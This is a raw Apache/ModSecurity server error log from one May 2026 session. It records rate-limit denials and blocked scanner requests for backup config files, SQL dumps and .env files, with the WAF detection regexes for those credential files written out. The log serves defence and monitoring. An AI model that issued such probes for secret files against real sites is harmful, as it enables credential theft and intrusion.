[Tue May 26 19:55:14.728032 2026] [qos:error] [pid 93576:tid 93802] [client 45.148.10.120:49004] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSmDRMqfxdEDkoszZFwAAAFo
[Tue May 26 19:55:14.731106 2026] [qos:error] [pid 93868:tid 94263] [client 45.148.10.120:49146] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSkqK9k_ZUB2Vp25SRgAAAZQ
[Tue May 26 19:55:14.731115 2026] [qos:error] [pid 93868:tid 94282] [client 45.148.10.120:60084] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtSkqK9k_ZUB2Vp25SRwAAAac
[Tue May 26 19:55:14.731944 2026] [qos:error] [pid 93868:tid 94324] [client 45.148.10.120:56886] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSkqK9k_ZUB2Vp25SSAAAAdE
[Tue May 26 19:55:14.732220 2026] [qos:error] [pid 93576:tid 93734] [client 45.148.10.120:49196] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSmDRMqfxdEDkoszZGAAAABY
[Tue May 26 19:55:14.736217 2026] [qos:error] [pid 93576:tid 93759] [client 45.148.10.120:43372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSmDRMqfxdEDkoszZGQAAAC8
[Tue May 26 19:55:14.810465 2026] [security2:error] [pid 93868:tid 94331] [client 152.42.213.139:56105] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.213.42.152.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/wp-login.php"] [unique_id "ahWtSkqK9k_ZUB2Vp25SDwAAAdg"], referer: https://www.google.com/search?q=wordpress
[Tue May 26 19:55:14.834931 2026] [qos:error] [pid 93868:tid 94379] [client 45.148.10.120:49046] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSkqK9k_ZUB2Vp25SSQAAAgg
[Tue May 26 19:55:14.840613 2026] [qos:error] [pid 93576:tid 93738] [client 45.148.10.120:43444] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSmDRMqfxdEDkoszZGgAAABo
[Tue May 26 19:55:14.844658 2026] [qos:error] [pid 93868:tid 94291] [client 45.148.10.120:48930] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSkqK9k_ZUB2Vp25SSgAAAbA
[Tue May 26 19:55:14.851577 2026] [qos:error] [pid 93868:tid 94353] [client 45.148.10.120:60050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSkqK9k_ZUB2Vp25SSwAAAe4
[Tue May 26 19:55:14.876835 2026] [qos:error] [pid 93576:tid 93775] [client 45.148.10.120:49004] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSmDRMqfxdEDkoszZHAAAAD8
[Tue May 26 19:55:14.880289 2026] [qos:error] [pid 93868:tid 94327] [client 45.148.10.120:60084] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSkqK9k_ZUB2Vp25STAAAAdQ
[Tue May 26 19:55:14.880362 2026] [qos:error] [pid 93868:tid 94286] [client 45.148.10.120:56886] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtSkqK9k_ZUB2Vp25STQAAAas
[Tue May 26 19:55:14.884338 2026] [qos:error] [pid 93868:tid 94371] [client 45.148.10.120:49146] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSkqK9k_ZUB2Vp25STgAAAgA
[Tue May 26 19:55:14.884501 2026] [qos:error] [pid 93576:tid 93742] [client 45.148.10.120:49196] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSmDRMqfxdEDkoszZHQAAAB4
[Tue May 26 19:55:14.886005 2026] [qos:error] [pid 93576:tid 93812] [client 45.148.10.120:43372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSmDRMqfxdEDkoszZHgAAAGQ
[Tue May 26 19:55:15.040854 2026] [security2:error] [pid 93576:tid 93762] [client 185.177.72.53:42764] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/admin/upload/config.bak"] [unique_id "ahWtS2DRMqfxdEDkoszZHwAAADI"]
[Tue May 26 19:55:15.159935 2026] [security2:error] [pid 93868:tid 94290] [client 113.160.132.26:15065] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "113.160.132.26" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWtS0qK9k_ZUB2Vp25SUwAAAa8"], referer: https://anujtradingco.com/wp-login.php?action=register
[Tue May 26 19:55:15.281653 2026] [security2:error] [pid 93868:tid 94383] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSUqK9k_ZUB2Vp25RoAAAAgw"]
[Tue May 26 19:55:15.293604 2026] [security2:error] [pid 93868:tid 94284] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSUqK9k_ZUB2Vp25RogAAAak"]
[Tue May 26 19:55:15.294052 2026] [security2:error] [pid 93868:tid 94354] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSUqK9k_ZUB2Vp25RowAAAe8"]
[Tue May 26 19:55:15.299916 2026] [security2:error] [pid 93868:tid 94258] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSUqK9k_ZUB2Vp25RoQAAAY8"]
[Tue May 26 19:55:15.303180 2026] [security2:error] [pid 93576:tid 93777] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSWDRMqfxdEDkoszYxQAAAEE"]
[Tue May 26 19:55:15.303823 2026] [security2:error] [pid 93576:tid 93807] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSWDRMqfxdEDkoszYwAAAAF8"]
[Tue May 26 19:55:15.310019 2026] [security2:error] [pid 93868:tid 94275] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSUqK9k_ZUB2Vp25RnQAAAaA"]
[Tue May 26 19:55:15.310914 2026] [security2:error] [pid 93868:tid 94303] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSUqK9k_ZUB2Vp25RrwAAAbw"]
[Tue May 26 19:55:15.313208 2026] [security2:error] [pid 93576:tid 93758] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSWDRMqfxdEDkoszYvwAAAC4"]
[Tue May 26 19:55:15.318972 2026] [security2:error] [pid 93868:tid 94296] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSUqK9k_ZUB2Vp25RvAAAAbU"]
[Tue May 26 19:55:15.319442 2026] [security2:error] [pid 93868:tid 94260] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSUqK9k_ZUB2Vp25RpAAAAZE"]
[Tue May 26 19:55:15.321038 2026] [security2:error] [pid 93868:tid 94289] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSUqK9k_ZUB2Vp25RqQAAAa4"]
[Tue May 26 19:55:15.330494 2026] [security2:error] [pid 93868:tid 94384] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSUqK9k_ZUB2Vp25RuAAAAg0"]
[Tue May 26 19:55:15.345768 2026] [security2:error] [pid 93868:tid 94276] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSUqK9k_ZUB2Vp25RuwAAAaE"]
[Tue May 26 19:55:15.352831 2026] [security2:error] [pid 93868:tid 94319] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSkqK9k_ZUB2Vp25SBAAAAcw"]
[Tue May 26 19:55:15.353422 2026] [security2:error] [pid 93868:tid 94361] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSUqK9k_ZUB2Vp25RqwAAAfY"]
[Tue May 26 19:55:15.355039 2026] [security2:error] [pid 93868:tid 94364] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSUqK9k_ZUB2Vp25RsgAAAfk"]
[Tue May 26 19:55:15.355767 2026] [security2:error] [pid 93868:tid 94367] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSUqK9k_ZUB2Vp25RugAAAfw"]
[Tue May 26 19:55:15.367170 2026] [security2:error] [pid 93576:tid 93727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSWDRMqfxdEDkoszYywAAAA8"]
[Tue May 26 19:55:15.372991 2026] [security2:error] [pid 93576:tid 93815] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSmDRMqfxdEDkoszY7AAAAGc"]
[Tue May 26 19:55:15.384991 2026] [security2:error] [pid 93868:tid 94332] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSkqK9k_ZUB2Vp25SEAAAAdk"]
[Tue May 26 19:55:15.385759 2026] [security2:error] [pid 93868:tid 94277] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSkqK9k_ZUB2Vp25SFwAAAaI"]
[Tue May 26 19:55:15.398932 2026] [security2:error] [pid 93576:tid 93820] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSmDRMqfxdEDkoszY7QAAAGw"]
[Tue May 26 19:55:15.414018 2026] [security2:error] [pid 93868:tid 94321] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSkqK9k_ZUB2Vp25SAQAAAc4"]
[Tue May 26 19:55:15.414821 2026] [security2:error] [pid 93868:tid 94344] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSkqK9k_ZUB2Vp25SIgAAAeU"]
[Tue May 26 19:55:15.424764 2026] [security2:error] [pid 93868:tid 94358] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSkqK9k_ZUB2Vp25SBQAAAfM"]
[Tue May 26 19:55:15.425226 2026] [security2:error] [pid 93868:tid 94310] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSkqK9k_ZUB2Vp25SFgAAAcM"]
[Tue May 26 19:55:15.443864 2026] [security2:error] [pid 93868:tid 94313] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSkqK9k_ZUB2Vp25SHgAAAcY"]
[Tue May 26 19:55:15.588747 2026] [security2:error] [pid 93868:tid 94331] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtS0qK9k_ZUB2Vp25SUgAAAdg"]
[Tue May 26 19:55:15.717490 2026] [security2:error] [pid 93576:tid 93730] [client 185.177.72.53:42764] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/backup/wp-config.sql"] [unique_id "ahWtS2DRMqfxdEDkoszZLQAAABI"]
[Tue May 26 19:55:15.885434 2026] [security2:error] [pid 93576:tid 93777] [client 185.177.72.53:42764] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/core/json/config.bak"] [unique_id "ahWtS2DRMqfxdEDkoszZVAAAAEE"]
[Tue May 26 19:55:15.887824 2026] [qos:error] [pid 93868:tid 94376] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtS0qK9k_ZUB2Vp25SkgAAAgU
[Tue May 26 19:55:15.888983 2026] [qos:error] [pid 93868:tid 94356] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWtS0qK9k_ZUB2Vp25SkwAAAfE
[Tue May 26 19:55:15.888943 2026] [qos:error] [pid 93576:tid 93833] [client 45.148.10.120:43462] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtS2DRMqfxdEDkoszZWgAAAHk
[Tue May 26 19:55:15.890329 2026] [qos:error] [pid 93868:tid 94377] [client 45.148.10.120:49068] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtS0qK9k_ZUB2Vp25SlgAAAgY
[Tue May 26 19:55:15.891977 2026] [qos:error] [pid 93868:tid 94275] [client 45.148.10.120:48922] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtS0qK9k_ZUB2Vp25SmgAAAaA
[Tue May 26 19:55:15.892534 2026] [qos:error] [pid 93868:tid 94280] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtS0qK9k_ZUB2Vp25SmAAAAaU
[Tue May 26 19:55:15.892593 2026] [qos:error] [pid 93868:tid 94340] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWtS0qK9k_ZUB2Vp25SnAAAAeE
[Tue May 26 19:55:15.893184 2026] [qos:error] [pid 93576:tid 93757] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtS2DRMqfxdEDkoszZWwAAAC0
[Tue May 26 19:55:15.895841 2026] [qos:error] [pid 93868:tid 94361] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtS0qK9k_ZUB2Vp25SnwAAAfY
[Tue May 26 19:55:15.897106 2026] [qos:error] [pid 93868:tid 94383] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtS0qK9k_ZUB2Vp25SoQAAAgw
[Tue May 26 19:55:16.222483 2026] [security2:error] [pid 93576:tid 93735] [client 185.177.72.53:42764] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/lms-app/frontend/.env"] [unique_id "ahWtTGDRMqfxdEDkoszZYAAAABc"]
[Tue May 26 19:55:16.231444 2026] [security2:error] [pid 93576:tid 93743] [client 162.216.148.0:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "bigpapaairbnbhotel.com"] [uri "/robots.txt"] [unique_id "ahWtTGDRMqfxdEDkoszZYgAAAB8"]
[Tue May 26 19:55:16.277521 2026] [security2:error] [pid 93576:tid 93771] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSmDRMqfxdEDkoszY_QAAADs"]
[Tue May 26 19:55:16.281472 2026] [security2:error] [pid 93576:tid 93761] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSmDRMqfxdEDkoszY8QAAADE"]
[Tue May 26 19:55:16.281777 2026] [security2:error] [pid 93868:tid 94300] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSkqK9k_ZUB2Vp25R_AAAAbk"]
[Tue May 26 19:55:16.295299 2026] [security2:error] [pid 93868:tid 94304] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSkqK9k_ZUB2Vp25SHQAAAb0"]
[Tue May 26 19:55:16.295319 2026] [security2:error] [pid 93576:tid 93803] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSmDRMqfxdEDkoszY9QAAAFs"]
[Tue May 26 19:55:16.299347 2026] [security2:error] [pid 93868:tid 94360] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSkqK9k_ZUB2Vp25SIAAAAfU"]
[Tue May 26 19:55:16.302686 2026] [security2:error] [pid 93576:tid 93744] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSmDRMqfxdEDkoszZAwAAACA"]
[Tue May 26 19:55:16.307821 2026] [security2:error] [pid 93868:tid 94372] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSkqK9k_ZUB2Vp25SMQAAAgE"]
[Tue May 26 19:55:16.308222 2026] [security2:error] [pid 93576:tid 93719] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSmDRMqfxdEDkoszY-wAAAAc"]
[Tue May 26 19:55:16.312837 2026] [security2:error] [pid 93868:tid 94320] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSkqK9k_ZUB2Vp25SJwAAAc0"]
[Tue May 26 19:55:16.317819 2026] [security2:error] [pid 93868:tid 94298] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSkqK9k_ZUB2Vp25SJAAAAbc"]
[Tue May 26 19:55:16.320381 2026] [security2:error] [pid 93868:tid 94315] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSkqK9k_ZUB2Vp25SHwAAAcg"]
[Tue May 26 19:55:16.322486 2026] [security2:error] [pid 93868:tid 94306] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSkqK9k_ZUB2Vp25SLQAAAb8"]
[Tue May 26 19:55:16.327726 2026] [security2:error] [pid 93868:tid 94326] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSkqK9k_ZUB2Vp25SMwAAAdM"]
[Tue May 26 19:55:16.329697 2026] [security2:error] [pid 93576:tid 93724] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSmDRMqfxdEDkoszY7gAAAAw"]
[Tue May 26 19:55:16.331073 2026] [security2:error] [pid 93868:tid 94308] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSkqK9k_ZUB2Vp25SIQAAAcE"]
